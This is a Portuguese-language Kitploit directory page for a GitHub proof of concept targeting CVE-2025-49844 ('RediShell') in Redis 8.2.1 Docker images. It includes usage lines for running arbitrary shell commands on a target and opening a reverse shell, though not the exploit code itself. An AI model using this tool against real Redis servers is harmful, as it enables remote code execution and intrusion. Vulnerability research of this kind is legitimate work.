Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-49844 — Prova de conceito para CVE-2025-49844 | Kitploit
Ferramentas/GitHubGitHub/saneki/cve-2025-49844
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubsaneki/cve-2025-49844

cve-2025-49844

Prova de conceito para CVE-2025-49844

Ver Repositório
2568há 10 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-49844

Minha prova de conceito pessoal para CVE-2025-49844, também conhecido como RediShell.

Builds de destino suportados:

  • Imagem Docker redis:8.2.1-alpine para Linux x86-64
  • Imagem Docker redis:8.2.1-bookworm para Linux x86-64

É um pouco tosco, provavelmente não tão bom quanto o da Wiz Research. Mesmo assim, fico feliz por ter conseguido fazê-lo funcionar antes de as palestras do Hexacon 2025 serem publicadas, e me diverti muito investigando-o.

Uso

Execute comandos de shell unidirecionais:

$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"

Conecte-se a um reverse shell:

$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444
Baixar ferramenta